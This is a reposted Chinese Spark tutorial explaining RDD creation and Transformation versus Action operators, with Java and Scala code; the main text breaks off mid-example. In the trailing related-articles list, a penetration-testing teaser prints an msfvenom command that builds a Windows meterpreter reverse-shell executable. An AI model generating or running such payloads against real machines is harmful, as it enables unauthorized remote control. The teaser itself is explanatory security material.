Spark-Transformation以及Action开发实战

文章目录

    • 创建RDD
    • Transformation以及Action
    • Transformation开发
    • Action开发
    • RDD持久化
    • 共享变量

创建RDD

  • RDD是Spark的编程核心,在进行Spark编程是,首要任务就是创建一个初始的RDD
  • Spark提供三种创建RDD方式:集合、本地文件、HDFS文件
    • 集合:主要用于本地测试,在实际部署到集群运行之前,自己使用集合构造测试数据,测试Spark流程
    • 本地文件:临时性的处理工作
    • HDFS:最常用的生产上的方式

使用集合创建RDD

  • 通过SparkContext.parallelize方法将集合转化为RDD
  • 通过parallelize方法可以设置RDD的partition数量,Spark会为每一个partition运行一个task来处理
public static void main(String[] args) {SparkConf sparkConf = new SparkConf();sparkConf.setAppName("CreateRDDArrayJava").setMaster("local");JavaSparkContext sc = new JavaSparkContext(sparkConf);List<Integer> list = Arrays.asList(1, 2, 3, 4);JavaRDD<Integer> rdd = sc.parallelize(list, 2);Integer sum = rdd.reduce(new Function2<Integer, Integer, Integer>() {@Overridepublic Integer call(Integer v1, Integer v2) throws Exception {return v1 + v2;}});System.out.println("sum:" + sum);}
  def main(args: Array[String]): Unit = {val conf = new SparkConf();conf.setAppName("CreateRDDArray").setMaster("local")val context = new SparkContext(conf);val arr = Array(1,2,3,4)// 集合创建RDDval rdd = context.parallelize(arr, 2)val sum = rdd.reduce(_ + _)println("sum=:" + sum)}

在这里插入图片描述

使用本地文件以及HDFS文件创建RDD

  • 通过SparkContext.textFile方法创建RDD,这时的RDD就是一行一行的文件数据
  • textFile方法支持针对目录、压缩文件以及通配符的方式
  • 默认会为HDFS文件的每一个Block创建一个partition,也可以通过textFile手动设置分区数量,只能比Block多,不能比Block少

这个可以参考上一篇blog(文件路径可以是hdfs://hadoop01:9000/test/hello,也可以是本地路径):https://blog.csdn.net/Grady00/article/details/136736362

Transformation以及Action

  • Spark支持两种RDD操作:Transformation、Action
    • Transformation可以理解为转换的意思,表示针对RDD数据的一个转换操作,主要对已有的RDD创建一个新的RDD,常见的有MAP,flatMap,filter等。
    • Transformation的特性:lazy,如果一个Spark任务只定义了Transformation算子,即使执行这个任务,任务中的算子也不会真正执行,也就是Transformation算子是不会出发Spark任务执行的,只是记录了对RDD的一些操作,只有进行了Action操作之后所有的Transformation才会真正执行。Spark通过lazy这种特性,来执行底层的Spark任务执行的优化,避免产生过多的中间结果
    • Action可以理解为执行,出发任务执行的操作,主要是对RDD进行最后的操作,比如遍历、reduce、保存到文件等,还可以把结果返回给Driver
    • Action特性:执行Action操作才会出发一个Spark Job的运行,从而触发这个Action之前所有的Transformation操作

不管是Transformation还是Action中的操作,我们都把它称为算子,比如map算子,reduce算子等等

Transformation开发

public static void main(String[] args) {SparkConf sparkConf = new SparkConf();sparkConf.setAppName("TransformationJava").setMaster("local");JavaSparkContext sc = new JavaSparkContext(sparkConf);// 将RDD中的每个元素进行处理,一进一出mapOp(sc);// 对RDD的每个元素进行判断,返回true则保存filterOp(sc);// 与map类似,但是每个元素都可以返回一个或多个新元素flatMapOp(sc);// 根据key进行分组,每个key对应一个Iterable<value>//BN:15003 15005 //US:150001 15002 //IN:15004 	groupByKeyOp(sc);groupByKeyOp2(sc);// 对每个相同的key对应的value进行reduce操作//reduceByKeyOp result:(BN,2)//reduceByKeyOp result:(US,2)//reduceByKeyOp result:(IN,1)reduceByKeyOp(sc);// 对每个相同的key对应的value进行排序操作sortedByKeyOp(sc);// 对两个包含<key,value>对的RDD进行join操作joinOp(sc);// 对RDD中的元素去重distinctOp(sc);}/*** 分组* @param sc*/private static void groupByKeyOp(JavaSparkContext sc) {Tuple2<Integer, String> t1 = new Tuple2<>(150001, "US");Tuple2<Integer, String> t2 = new Tuple2<>(15002, "US");Tuple2<Integer, String> t3 = new Tuple2<>(15003, "BN");Tuple2<Integer, String> t4 = new Tuple2<>(15004, "IN");Tuple2<Integer, String> t5 = new Tuple2<>(15005, "BN");List<Tuple2<Integer, String>> list = Arrays.asList(t1, t2, t3, t4, t5);JavaRDD<Tuple2<Integer, String>> rdd = sc.parallelize(list);rdd.mapToPair(new PairFunction<Tuple2<Integer, String>, String, Integer>() {@Overridepublic Tuple2<String, Integer> call(Tuple2<Integer, String> tup) throws Exception {return new Tuple2<>(tup._2, tup._1);}}).groupByKey().foreach(new VoidFunction<Tuple2<String, Iterable<Integer>>>() {@Overridepublic void call(Tuple2<String, Iterable<Integer>> tup) throws Exception {String area = tup._1;System.out.print(area + ":");Iterable<Integer> id = tup._2;for (Integer item: id) {System.out.print(item + " ");}System.out.println();}});}/*** 拆分* @param sc*/private static void flatMapOp(JavaSparkContext sc) {JavaRDD<String> javaRDD = sc.parallelize(Arrays.asList("good work", "work hard", "tom good", "take it easy"));javaRDD.flatMap(new FlatMapFunction<String, String>() {@Overridepublic Iterator<String> call(String line) throws Exception {String[] words = line.split(" ");return Arrays.asList(words).iterator();}}).

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/544393.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL--深入理解MVCC机制原理

什么是MVCC&#xff1f; MVCC全称 Multi-Version Concurrency Control&#xff0c;即多版本并发控制&#xff0c;维持一个数据的多个版本&#xff0c;主要是为了提升数据库的并发访问性能&#xff0c;用更高性能的方式去处理数据库读写冲突问题&#xff0c;实现无锁并发。 什…

R语言深度学习-5-深度前馈神经网络

本教程参考《RDeepLearningEssential》 本篇我们将学习如何建立并训练深度预测模型。我们将关注深度前馈神经网络 5.1 深度前馈神经网络 我们还是使用之前提到的H2O包&#xff0c;详细可以见之前的博客&#xff1a;R语言深度学习-1-深度学习入门&#xff08;H2O包安装报错解决…

从阿里云降价,看中国云计算创新之变

继“疯狂星期四”历史级大降价后&#xff0c;阿里云“AI驱动、公共云优先”的战略布局再落一子。 近日&#xff0c;阿里云与菜鸟、高德地图、中远海运、东航物流、圆通速递、申通快递、中通快递、德邦快递、G7易流、地上铁、浙江大学智能交通研究所等共同发起成立“物流智能联…

cool 中的Midway ----node.js的TypeORM的使用

1.介绍 TypeORM | Midway TypeORM 是 node.js 现有社区最成熟的对象关系映射器&#xff08;ORM &#xff09;。本文介绍如何在 Midway 中使用 TypeORM 相关信息&#xff1a; 描述可用于标准项目✅可用于 Serverless✅可用于一体化✅包含独立主框架❌包含独立日志❌ 和老写…

计算机网络-概述

文章目录 1.2 因特网概述1.2.1 网络、互连网&#xff08;互联网&#xff09;和因特网1.2.2 因特网发展的三个阶段1.2.4 因特网的组成 1.3 三种交换方式1.3.1 电路交换1.3.2 分组交换1.3.3 报文交换1.3.4 三种方式对比 1.4 计算机网络的定义1.5 计算机网络的性能指标1.5.1 速率1…

渗透测试框架权限维持技术——Persistence模块

测试环境&#xff1a; kali win7 测试步骤&#xff1a; 1.利用MSF编写远控程序 msfvenom -p windows/meterpreter/reverse_tcp lhost10.0.0.163 lport55555 -f exe -o 5555.exe-p 漏洞利用payload lhost 监听地址&#xff08;kali地址&#xff09; lport 监听端口&#xf…

uniapp——第2篇:编写vue语法

前提&#xff0c;建议先学会前端几大基础&#xff1a;HTML、CSS、JS、Ajax&#xff0c;还有一定要会Vue!&#xff08;Vue2\Vue3&#xff09;都要会&#xff01;&#xff01;&#xff01;不然不好懂 一、去哪写&#xff1f; 就在【pages】的你的人一个页面文件夹里的【.vue】文…

Vue2在一个页面内动态切换菜单显示对应的路由组件

项目的需求是在一个页面内动态获取导航菜单&#xff0c;导航菜单切换的时候显示对应的路由页面&#xff0c;类似于tab切换的形式&#xff0c;切换的导航菜单和页面左侧导航菜单是同一个路由组件&#xff0c;只是放到了一个页面上&#xff0c;显示的个数不同&#xff0c;所有是动…

lftp服务与http服务(包含scp服务)详解

目录 前言: 1.lftp服务 1.1lftp服务的介绍以及应用场景 1.2安装lftp服务 1.2进行配置 1.3实际操作 2.http服务 2.1http服务介绍以及应用场景 2.1安装httpd服务 2.2进行配置 2.3实际操作 3.scp服务 3.1scp服务的介绍以及应用场景 致谢: 前言: 在当今互联网…

Visual Studio项目模板的创建与使用

Visual Studio项目模板的创建、使用、删除 创建模板项目模板的使用模板的删除 创建模板 点击项目&#xff0c;点击导出模板 选择你要创建哪个项目的项目模板&#xff0c;点击下一步 输入你的模板名称并添加模板说明&#xff0c;方便记忆 项目模板的使用 点击创建新项目 输入刚刚…

android中单例模式为什么会引起内存泄漏?

单例模式使用不恰当会造成内存泄漏。因为单例的静态特性使得单例的生命周期和应用的生命周期一样长&#xff0c; 如果一个对象已经不需要使用了&#xff0c;但是单例对象还持有该对象的引用&#xff0c;那么这个对象就不能被正常回收&#xff0c;因此会导致内存泄漏。 举个例子…

CI/CD实战-git工具使用 1

版本控制系统 本地版本控制系统 集中化的版本控制系统 分布式版本控制系统 git官网文档&#xff1a;https://git-scm.com/book/zh/v2 Git 有三种状态&#xff1a;已提交&#xff08;committed&#xff09;、已修改&#xff08;modified&#xff09; 和 已暂存&#xff08;sta…